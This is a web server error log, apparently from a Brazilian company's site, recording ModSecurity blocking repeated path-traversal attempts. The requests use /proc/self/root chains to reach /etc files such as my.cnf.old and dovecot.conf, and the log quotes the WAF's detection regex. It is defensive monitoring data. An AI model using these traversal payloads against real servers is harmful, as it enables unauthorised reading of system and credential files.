[Wed Mar 18 12:28:02.865431 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.241.31:50806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrEgimAPhZkrhU8w4l_EAAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:28:56.815234 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.241.31:50158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrEuPu8EFLIOrSqIpsVSAAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:28:58.651489 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.228.61:41734] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrEueoXxyEfFpUF8f9_DQAAAUY"]
[Wed Mar 18 12:28:58.659571 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.244.43:54368] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrEuvu8EFLIOrSqIpsVSwAAAkk"]
[Wed Mar 18 12:29:02.590268 2026] [mime_magic:error] [pid 17653:tid 140411691570944] (70014)End of file found: [client 57.141.18.76:36740] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:29:06.594528 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:36146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrEwkzinOy1jxa1j4cnvAAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 12:29:12.299387 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:39582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrEyOoXxyEfFpUF8f9_HQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:29:14.804653 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.241.31:57756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrEyimAPhZkrhU8w4l_PQAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:30:35.369548 2026] [:error] [pid 26799:tid 140411716749056] [client 216.73.216.191:18295] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrFGta6ubjKNq_cu4auKQAAA0M"]
[Wed Mar 18 12:31:18.967147 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:36208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrFRta6ubjKNq_cu4auTgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:31:19.020503 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:53354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrFRwkwaGbbGflqUZAiAwAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:31:35.251739 2026] [:error] [pid 29882:tid 140411574073088] [client 216.73.216.191:22406] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrFV0zinOy1jxa1j4coJgAAARQ"]
[Wed Mar 18 12:32:02.207437 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:41898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrFctY0UrI5A3LftIzD5gAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:33:30.776576 2026] [mime_magic:error] [pid 31803:tid 140411574073088] (70014)End of file found: [client 57.141.18.17:46534] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:33:33.763385 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:41900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrFzQkwaGbbGflqUZAihAAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:33:39.838721 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.241.31:53914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrF00zinOy1jxa1j4coaAAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:33:58.353531 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.228.61:50812] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrF5uyqAr6etmhZHNrW1gAAAEc"]
[Wed Mar 18 12:33:58.850894 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.244.43:52174] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrF5tY0UrI5A3LftIzETgAAAYE"]
[Wed Mar 18 12:35:23.980741 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:48814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrGOwkwaGbbGflqUZAjDQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:36:48.393295 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:46054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrGkNa6ubjKNq_cu4avQwAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:38:41.757809 2026] [mime_magic:error] [pid 15051:tid 140411649607424] (70014)End of file found: [client 57.141.18.49:56678] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:38:58.571068 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.228.61:56322] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrHEta6ubjKNq_cu4avnQAAA1I"]
[Wed Mar 18 12:39:00.470868 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.244.43:56604] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrHFCmAPhZkrhU8w4mA2wAAAIo"]
[Wed Mar 18 12:39:32.927333 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:40538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrHNAkwaGbbGflqUZAjwwAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:41:27.768061 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:57646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrHpwkwaGbbGflqUZAkgQAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:43:26.441891 2026] [mime_magic:error] [pid 19507:tid 140411557287680] (70014)End of file found: [client 74.7.241.31:60690] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware
[Wed Mar 18 12:43:42.476458 2026] [mime_magic:error] [pid 15051:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:32348] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:43:47.406072 2026] [mime_magic:error] [pid 17653:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:42672] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/lib/yum/yumdb
[Wed Mar 18 12:43:59.178861 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.228.61:35520] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrIP8df6f5d65gmYZTpKgAAAs8"]
[Wed Mar 18 12:44:02.283372 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.244.43:59566] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrIQuyqAr6etmhZHNrZRQAAAEo"]
[Wed Mar 18 12:44:14.094906 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:45520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrITgkwaGbbGflqUZAk7gAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:44:30.226651 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.241.31:42718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrIXuw_le52K8_3pV3y0AAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
